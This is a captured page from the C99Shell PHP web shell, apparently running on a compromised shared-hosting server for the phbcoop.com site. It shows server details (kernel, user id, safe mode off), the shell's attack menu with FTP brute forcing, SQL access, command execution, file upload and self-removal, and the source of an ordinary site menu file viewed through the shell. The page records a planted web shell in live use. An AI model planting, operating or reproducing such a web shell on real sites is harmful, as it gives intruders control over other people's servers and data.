!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: Apache. PHP/5.6.40 

uname -a: Linux cpanel06wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24
01:42:00 EDT 2020 x86_64
 

uid=851(cp949260) gid=853(cp949260) groups=853(cp949260) 

Safe-mode: OFF (not secure)

/home/cp949260/public_html/phbcoop.com/includes/   drwxr-xr-x
Free 236.1 GB of 981.82 GB (24.05%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     rightmenu.php (2.7 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

                                    <div class="col">
                                        <h4 class="font-weight-bold">เมนูหลัก </h4>
                                        
                                            
                                            <div class="accordion accordion-modern" >

                                            <?php
                                        $result_cat 
$conn->prepare("SELECT id,categoryname,submenu,link FROM tbl_category");
                                        
$result_cat->execute();
                                        for(
$i=0$row_cat $result_cat->fetch(); $i++){
                                            
$id_cat=$row_cat['id'];
                                            
$menu $row_cat['submenu'];
                                            
$link $row_cat['link'];
                                        
                                        
?>
                                        <?php 
                          
if (!is_numeric($menu)) {
                                            switch (
$menu) {

                                                case 
"a":
                                                
$icon "icons icon-grid text-color-primary";
                                                break;
                                                case 
"b":
                                                
$icon "icons icon-diamond text-color-primary";
                                                break;
                                                case 
"c":
                                                
$icon ="icons icon-directions text-color-primary";
                                                break;
                                                case 
"d":
                                                
$icon "icons icon-layers text-color-primary";
                                                break;
                                                case 
"e":
                                                    
$icon "icons icon-bulb text-color-primary";
                                                    break;
                                                case 
"f":
                                                    
$icon "icons icon-badge text-color-primary";
                                                    break;
                                                    case 
"g":
                                                        
$icon "icons icon-organization text-color-primary";
                                                        break;
                                                        case 
"h":
                                                            
$icon "icons icon-event text-color-primary";
                                                            break;
                                                            case 
"i":
                                                                
$icon "icons icon-graduation text-color-primary";
                                                                break;
                                                
                                                default:
                                                
$icon "os-icon os-icon-grid-squares-2";
                                            }

                                            switch (
$link) {

                                                case 
"pdf":
                                                
$linkname "pdf_phbcoop.php";
                                                break;
                                                case 
"pdf_year":
                                                    
$linkname "pdf_year.php";
                                                    break;
                                                case 
"onepage":
                                                    
$linkname "article.php";
                                                break;
                                                case 
"article":
                                                    
$linkname "article.php";
                                                break;

                                                default:
                                                
$icon "os-icon os-icon-grid-squares-2";
                                            }
                          
                                          
?>

                                                <div class="card text-color-light">
                                                    <div class="card-header">
                                                        <h4 class="card-title m-0">
                                                            <a class="accordion-toggle text-color-dark font-weight-bold"  href="<?php echo $linkname?>?v_id=<?php echo $id_cat?>">
                                                                <i class="<?= $icon?>"></i>
                                                                <?php echo $row_cat['categoryname']; ?>
                                                            </a>
                                                        </h4>
                                                    </div>
                                                </div>

                                                <?php }} ?>
                                            </div>
                                                
                                                    
                                            
                                        
                                    </div>
                                    
                                

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.1799 ]--